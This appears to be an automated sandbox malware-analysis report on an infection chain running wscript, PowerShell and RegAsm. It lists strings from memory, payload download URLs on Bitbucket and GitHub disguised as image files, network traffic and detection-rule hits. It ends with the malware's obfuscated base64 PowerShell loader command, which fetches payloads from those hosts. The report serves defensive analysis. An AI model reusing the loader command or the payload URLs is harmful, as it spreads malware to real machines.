                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                  Source: powershell.exe, 00000004.00000002.2356536853.00000158A8C2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.0000011695FD1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                  Source: powershell.exe, 00000006.00000002.2009787604.000001169A162000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/D
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.00000000033B2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.00000000033C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.00000000033C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.00000000033C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3ResponseD
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                  Source: powershell.exe, 00000006.00000002.2009787604.00000116961F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003578000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.00000000035D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: powershell.exe, 00000004.00000002.2356536853.00000158A8BE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
                  Source: powershell.exe, 00000004.00000002.2356536853.00000158A8BFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.0000011695FD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                  Source: powershell.exe, 00000006.00000002.2009787604.000001169A162000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.000001169AA9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.000001169AAC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                  Source: powershell.exe, 00000006.00000002.2009787604.000001169BBE2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.000001169AA9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.000001169AAC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
                  Source: RegAsm.exe, 0000000A.00000002.2070112434.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/ip
                  Source: powershell.exe, 00000006.00000002.2009787604.00000116963CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.00000116961F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
                  Source: powershell.exe, 00000006.00000002.2009787604.00000116961F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
                  Source: powershell.exe, 00000006.00000002.2009787604.00000116961F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;
                  Source: powershell.exe, 00000006.00000002.2009787604.0000011699F8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com
                  Source: powershell.exe, 00000006.00000002.2009787604.0000011699F8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/4be491a4-012e-46db-bc28-27fee082b0f0/downloads/f4d27c97-7447-
                  Source: powershell.exe, 00000006.00000002.2009787604.0000011699F8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org
                  Source: powershell.exe, 00000006.00000002.2009787604.0000011699F8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/rulmerurk/ertertqw/downloads/wil25.txt
                  Source: powershell.exe, 00000004.00000002.2356536853.00000158A912F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009259281.0000011694615000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009259281.0000011694600000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009259281.000001169468B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.0000011695FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.00000116961F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009178942.00000116945F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.000001169A611000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009611502.00000116948E4000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.00000000032CD000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.00000000033B2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2113417744.00000000058C2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/shieldadas/gsdghjj/downloads/img_test.jpg?11811735
                  Source: powershell.exe, 00000006.00000002.2009787604.00000116963CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.00000116961F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003578000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.00000000035D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003578000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.00000000035D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003578000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.00000000035D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: powershell.exe, 00000006.00000002.2180041321.00000116A6042000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000006.00000002.2180041321.00000116A6042000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000006.00000002.2180041321.00000116A6042000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003578000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.00000000035D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.00000000035D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabS
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003578000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.00000000035D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: powershell.exe, 00000006.00000002.2009787604.00000116963CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.00000116961F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
                  Source: powershell.exe, 00000006.00000002.2009787604.00000116961F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 00000006.00000002.2009787604.000001169AE3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.000001169BBE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                  Source: powershell.exe, 00000006.00000002.2180041321.00000116A6042000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: powershell.exe, 00000006.00000002.2009787604.00000116961F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
                  Source: powershell.exe, 00000004.00000002.2356536853.00000158A912F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009259281.0000011694615000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009259281.0000011694600000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009259281.000001169468B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.0000011695FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.00000116961F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009178942.00000116945F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.000001169A611000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009611502.00000116948E4000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.00000000032CD000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.00000000033B2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2113417744.00000000058C2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723
                  Source: powershell.exe, 00000006.00000002.2009787604.00000116963CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.00000116961F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
                  Source: powershell.exe, 00000006.00000002.2009787604.00000116963CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.00000116961F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
                  Source: powershell.exe, 00000006.00000002.2009787604.00000116963CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.00000116961F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003578000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.00000000035D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003578000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.00000000035D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49738
                  Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
                  Source: unknown | Network traffic detected: HTTP traffic on port 49738 -> 443
                  Source: unknown | HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49730 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.4:49735 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 52.216.210.153:443 -> 192.168.2.4:49738 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File created: C:\Users\user\AppData\Local\Temp\Tmp24C5.tmp
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File created: C:\Users\user\AppData\Local\Temp\Tmp24A4.tmp

                  System Summary

                  Source: Process Memory Space: powershell.exe PID: 7476, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 7664, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Network Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{093FF999-1EA0-4079-9525-9614C3504B74}
                  Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#HM#a#Bp#GU#b#Bk#GE#Z#Bh#HM#LwBn#HM#Z#Bn#Gg#agBq#C8#Z#Bv#Hc#bgBs#G8#YQBk#HM#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#MQ#4#DE#MQ#3#DM#NQ#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz
